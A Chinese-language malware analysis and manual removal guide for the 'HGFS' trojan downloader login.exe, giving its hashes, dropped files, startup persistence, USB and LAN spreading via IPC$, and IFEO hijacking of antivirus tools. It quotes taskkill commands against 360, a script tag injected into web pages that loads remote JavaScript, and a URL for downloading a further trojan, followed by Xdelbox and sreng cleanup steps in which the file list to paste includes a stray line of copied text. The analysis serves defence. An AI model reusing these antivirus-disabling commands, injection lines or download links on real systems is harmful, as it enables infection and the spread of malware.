HGFS木马下载器的手动查杀-东北IT网

这是一个具有感染脚本功能和局域网传播功能的木马下载器

样本信息：File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203

1.病毒初始化:创建互斥量HGFSMUTEX，保证系统内只有一个实例在运行

2.释放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe

3.执行connnet.bat批处理内的内容

a.遍历d~z盘复制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目录下

b.判断中毒机器是否处于局域网，如果是则利用ipc漏洞建立一个空连接，并把autorun.exe和%autorun.inf复制到机器的C$下面。

4.IFEO劫持某些杀毒软件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不给你启动.exe

5.试图结束360软件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6.遍历所有磁盘删除.gho文件

7.遍历所有磁盘感染asp，htm，html，aspx，php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代码

8.链接网络下载木马
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但链接已经失效

解决方法：

到down.45it.com下载sreng和Xdelbox

1.复制如下文字到剪贴板(假设系统在C盘)
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe

打开Xdelbox.exe
在下面的大框中单击右键点击 “剪贴板导入不检查路径”
之后刚才复制的那个文件列表将出现在下面的大框中
然后再在下面的大框中单击右键点击 “立即重启执行删除”
软件会自动重启计算机

重启计算机以后会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
不用你管，它会自动选择进入第二个系统
类似dos的界面滚动完毕以后病毒就被删除了
之后他会自动重启进入正常模式

2.打开sreng 启动项目注册表
删除所有红色的IFEO项目

3.建议屏蔽http://17vp.cn网站